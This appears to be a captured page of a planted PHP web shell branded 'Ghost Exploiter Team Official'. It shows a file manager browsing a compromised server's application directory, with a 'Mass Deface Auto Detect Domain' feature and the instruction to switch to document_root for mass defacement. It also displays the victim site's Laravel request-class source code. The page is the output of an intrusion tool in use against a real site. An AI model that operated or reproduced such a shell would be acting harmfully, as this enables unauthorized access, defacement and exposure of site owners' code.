Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
app
/
Domain
/
Project
/
Requests
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
CreateProjectGroupReque
...
0.982KB
edt
ren
CreateProjectRequest.php
1.755KB
edt
ren
UpdateProjectGroupReque
...
0.676KB
edt
ren
UpdateProjectRequest.php
1.76KB
edt
ren
<?php declare(strict_types=1); namespace App\Domain\Project\Requests; use App\BaseClasses\BaseApiRequest; class CreateProjectGroupRequest extends BaseApiRequest { public static function bodyParameters(): array { return [ 'name' => ['description' => 'name'], 'description' => ['description' => 'description'], 'projects' => ['description' => 'projects ids'], ]; } public static function example(): array { return [ 'name' => 'Тестовая группа проектов', 'description' => 'Описание', 'projects' => 'ID проектов', ]; } public function authorize(): bool { return true; } public function rules(): array { return [ 'name' => ['required', 'string', 'max:255'], 'description' => ['nullable', 'string', 'max:255'], 'projects' => ['nullable', 'array'], ]; } }
<=Back
Liking